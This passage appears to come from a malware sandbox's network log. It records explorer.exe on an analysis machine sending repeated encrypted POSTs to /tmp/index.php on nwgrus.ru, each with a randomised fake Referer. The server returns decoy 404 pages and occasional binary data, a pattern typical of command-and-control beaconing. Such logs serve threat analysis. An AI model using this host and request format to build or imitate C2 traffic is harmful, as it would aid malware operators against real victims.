                                                                                                      Oct 8, 2024 00:20:11.597990990 CEST151OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 45 5d fc ae
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuE]M2yaV}v`/A,WW)b{|HY%KR(BPUw
                                                                                                      Oct 8, 2024 00:20:12.351321936 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:12 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.449755109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:12.361294985 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://gwvqwjkmpeg.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 204
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:12.361305952 CEST204OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 2e 09 a4 b6
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu.vNbkv!=.kM`3xE*M]gEQ2bbI8SrR,[iH
                                                                                                      Oct 8, 2024 00:20:13.116003990 CEST137INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:12 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.449756109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:13.360466957 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://cqnqsxdlukmk.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 302
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:13.360500097 CEST302OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 71 3d d4 a2
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuq=c[GYcb2[;;b5#pEDh)U@@T8!})C<^.zu{ZcMuk. r`tCHJ
                                                                                                      Oct 8, 2024 00:20:14.108429909 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:13 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.449757109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:14.118573904 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://dlawyaqdtqgx.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 357
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:14.118573904 CEST357OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 59 01 ec e1
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuYo7qCRwMVl^`4}`UuM*%?.<>Sz^36KWBu/#lWV0!m[oe4F/eBxc<
                                                                                                      Oct 8, 2024 00:20:14.977386951 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:14 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.449758109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:14.987154961 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://gxrfdgbwqcu.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 368
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:14.987200975 CEST368OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 47 29 a2 8e
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuG)^\FK=DBkw}rpk{2%'M%)[Kw<MfI[*^J8knV$^7dxAY)CWG~!Y5
                                                                                                      Oct 8, 2024 00:20:15.764854908 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:15 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.449759109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:15.980737925 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://mihbhgkrdwqnogym.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 287
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:15.982208014 CEST287OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 28 27 b9 8e
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu('W4gHeas%9dKu>\_1\f Py #@s?Kb3']K]G 5j@KG]ai%:)X
                                                                                                      Oct 8, 2024 00:20:16.759238005 CEST189INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:16 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                                                      Data Ascii: #\6Y9l_m=rA


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.449761109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:18.648441076 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://bhprxmbpfsifjwvd.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 187
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:18.648473978 CEST187OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 38 59 cc eb
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA ,[k,vu8YU_}ymz:xA:)<]F:<[E#F&F&4TWNj!? <MLx3
                                                                                                      Oct 8, 2024 00:20:19.925240040 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:19 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                      Oct 8, 2024 00:20:19.925376892 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:19 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.449762109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:19.943342924 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://vqoayhqrgjlg.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 189
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:19.943342924 CEST189OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 39 07 bf a1
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu9wOL1tZ{nvyeW*Lb;[?Bn,A11}H.If-!
                                                                                                      Oct 8, 2024 00:20:20.864453077 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:20 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.449763109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:20.876399040 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://cmfmcxiuegbxwbfb.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 173
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:20.876416922 CEST173OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 63 00 c7 b9
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vucU[gR_Rm#4!fMBfw2z2=\JYQdcSLgr_jV/
                                                                                                      Oct 8, 2024 00:20:21.651169062 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:21 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
